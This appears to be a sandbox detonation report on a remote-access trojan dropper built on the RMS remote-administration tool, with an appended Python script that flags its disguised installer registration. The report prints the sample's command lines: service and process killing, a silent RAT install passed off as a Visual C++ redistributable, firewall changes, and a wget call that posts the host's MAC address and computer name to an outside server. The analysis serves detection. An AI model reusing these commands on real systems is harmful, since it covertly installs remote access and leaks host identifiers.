PID 3560 wrote to memory of 916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 1524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe

"C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe"

C:\Users\Admin\AppData\Local\Temp\set.exe

"C:\Users\Admin\AppData\Local\Temp\set.exe" -p1234567890__

C:\Users\Admin\AppData\Local\Temp\setting.exe

"C:\Users\Admin\AppData\Local\Temp\setting.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.cmd" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\system32\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\syswow64\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\net.exe

net stop rmanservice

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop rmanservice

C:\Windows\SysWOW64\sc.exe

sc delete "rmanservice"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe *32

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe *32

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {FE83B905-4554-4DFF-97F4-9292178CB171} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\85809A11BB0485842AADAC46595B9E70\InstallProperties" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\85809A11BB0485842AADAC465 95B9E70" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AB7AA605-500F-4153-8207-FB5563419112}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\506AA7BAF00535142870BF5536141921" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6EDC4423414699340B5D245426472701" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E45BAE6295648E74689FC47BF4E730EB" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E5052F47A02BDEA469F8EAB572D83BA8" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\System\CurrentControlSet\Services\RManService" /f

C:\Windows\SysWOW64\PING.EXE

ping -n 1 -w 500 google.com.ua

C:\Windows\SysWOW64\msiexec.exe

MsiExec /I "rms5.2.1.msi" /qn

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 14B7B4596FA45B7BCF74D202BD8A2D13

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /silentinstall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /silentinstall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /firewall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /firewall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\PING.EXE

ping -n 10 127.0.0.1

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"|Find /I "Options"

C:\Windows\SysWOW64\reg.exe

Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"

C:\Windows\SysWOW64\find.exe

Find /I "Options"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c getmac|Find /I "Tcpip"

C:\Windows\SysWOW64\getmac.exe

getmac

C:\Windows\SysWOW64\find.exe

Find /I "Tcpip"

C:\Users\Admin\AppData\Local\Temp\wget.exe

wget --post-data="mac=76-BA-EE-31-78-4E&comp=MHKKHUYI&id…group=download" "http://rms.admin-ru.ru/updater.php" -q -O -

C:\Windows\SysWOW64\PING.EXE

ping -n 3 127.0.0.1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com.ua udp
US 8.8.8.8:53 rmansys.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
RU 31.31.198.18:80 rmansys.ru tcp
US 8.8.8.8:53 rms.admin-ru.ru udp

Files


Analysis: behavioral1

Detonation Overview

Submitted

2022-01-28 15:19

Reported

2022-01-28 16:02

Platform

win7-en-20211208

Max time kernel

146s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe"

Signatures

RMS

trojan rat rms

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\sysfiles\msimg32.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcr90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\ripcserver.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8decoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\gdiplus.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\oledlg.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8encoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rasadhlp.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rwln.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\microsoft.vc90.crt.manifest C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcp90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rfusclient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rutserv.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\Installer\f762c9c.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f762c9c.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f762ca0.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f762c9e.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\Installer\f762c9e.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI31EA.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2DA5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A

Launches sc.exe

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Language = "1049" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Version = "97648640" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\1 = "DISK1;1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921\Remote_Office_Manager C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductName = "Microsoft Visual C++ 2008 Redistributable - x86 10.0.743894.2047" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\PackageCode = "558594499A0F7BE41A10BED2C55AA173" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductIcon = "C:\\Windows\\Installer\\{AB7AA605-500F-4153-8207-FB5563419112}\\ARPPRODUCTICON.exe" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\PackageName = "rms5.2.1.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
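
The product registration above is worth reading as a whole rather than row by row: msiexec registers product code 506AA7BAF00535142870BF5536141921 with ProductName "Microsoft Visual C++ 2008 Redistributable - x86 10.0.743894.2047", yet the package is rms5.2.1.msi and the only feature is Remote_Office_Manager. The script below is an added example, not part of the sandbox report and not RMS code: it parses the rows exactly as printed here, decodes the packed product and upgrade codes back into the {GUID} form used elsewhere in this report, decodes the Version DWORD, and flags the name mismatch. The row grammar, the mismatch heuristic and the finding text are this example's own assumptions.

```python
"""Added example, not part of the sandbox report: rebuild the Windows Installer product
registration from the 'Modifies registry class' rows above and test whether the advertised
ProductName matches what was really registered. The row grammar, the GUID and version
decoders and the mismatch heuristic are this example's own; the rows are copied verbatim."""
import re

# Constructed input: rows copied from the table above (Description Indicator Process Target).
ROWS = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Language = "1049" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921\Remote_Office_Manager C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductName = "Microsoft Visual C++ 2008 Redistributable - x86 10.0.743894.2047" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Version = "97648640" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\PackageName = "rms5.2.1.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductIcon = "C:\\Windows\\Installer\\{AB7AA605-500F-4153-8207-FB5563419112}\\ARPPRODUCTICON.exe" C:\Windows\system32\msiexec.exe N/A
"""

# One report row: operation, registry path, optional '= data', acting process, target.
ROW_RE = re.compile(
    r'^(?P<op>Key created|Key deleted|Set value \((?P<type>\w+)\))\s+'
    r'(?P<path>\\REGISTRY\\\S+)'
    r'(?:\s+=\s+(?P<data>"[^"]*"|\S+))?'
    r'\s+(?P<proc>\S+)\s+(?P<target>\S+)$')
KEY_RE = re.compile(r'\\Installer\\(Products|Features|UpgradeCodes)\\([0-9A-F]{32})(?:\\(.+))?$', re.I)
LCIDS = {"1033": "en-US", "1049": "ru-RU"}  # only the two this example needs

def unsquish_guid(s):
    """Undo the Installer's packed-GUID form: reverse the first three fields,
    then swap each pair of hex digits in the remaining 16."""
    tail = "".join(s[i + 1] + s[i] for i in range(16, 32, 2))
    return "{%s-%s-%s-%s-%s}" % (s[0:8][::-1], s[8:12][::-1], s[12:16][::-1], tail[:4], tail[4:])

def decode_msi_version(dword):
    """The Products\\Version DWORD packs major.minor.build as 8/8/16 bits."""
    v = int(dword)
    return (v >> 24, (v >> 16) & 0xFF, v & 0xFFFF)

def parse_rows(text):
    """Group the rows by product code; return (products, upgrade_codes)."""
    products, upgrade_codes = {}, []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError("unparsed row: " + line)
        km = KEY_RE.search(m["path"])
        if not km:
            continue  # not an Installer\Products, Features or UpgradeCodes path
        kind, code, rest = km.group(1).lower(), km.group(2).upper(), km.group(3)
        if kind == "upgradecodes":
            if code not in upgrade_codes:
                upgrade_codes.append(code)
            continue
        p = products.setdefault(code, {"values": {}, "features": []})
        if kind == "features" and rest:
            p["features"].append(rest)
        elif kind == "products" and rest and m["data"] is not None:
            p["values"][rest] = m["data"].strip('"')
    return products, upgrade_codes

def assess(code, product):
    """Return the reconstructed registration plus the findings this heuristic raises."""
    vals, findings = product["values"], []
    name = vals.get("ProductName", "")
    package = vals.get(r"SourceList\PackageName", "")
    version = decode_msi_version(vals["Version"]) if "Version" in vals else None
    # Heuristic (assumption): words of the advertised name should show up in the
    # package file name or the feature names; a registration with no overlap is suspect.
    words = set(re.findall(r"[a-z]{4,}", name.lower()))
    evidence = " ".join([package] + product["features"]).lower()
    if words and not any(w in evidence for w in words):
        findings.append(f'ProductName "{name}" shares no word with package "{package}" or features {product["features"]}')
    if version and ".".join(map(str, version)) not in name:
        findings.append(f"registered Version {'.'.join(map(str, version))} is absent from ProductName")
    return {"product_code": code, "product_guid": unsquish_guid(code), "product_name": name,
            "package": package, "version": version,
            "language": LCIDS.get(vals.get("Language"), vals.get("Language")),
            "features": product["features"], "findings": findings}

if __name__ == "__main__":
    products, upgrades = parse_rows(ROWS)
    for code, prod in products.items():
        r = assess(code, prod)
        print(f"{r['product_guid']} {r['product_name']!r} <- {r['package']} v{r['version']} lang={r['language']}")
        for f in r["findings"]:
            print("  !", f)
    for u in upgrades:
        print("upgrade code", unsquish_guid(u))
```

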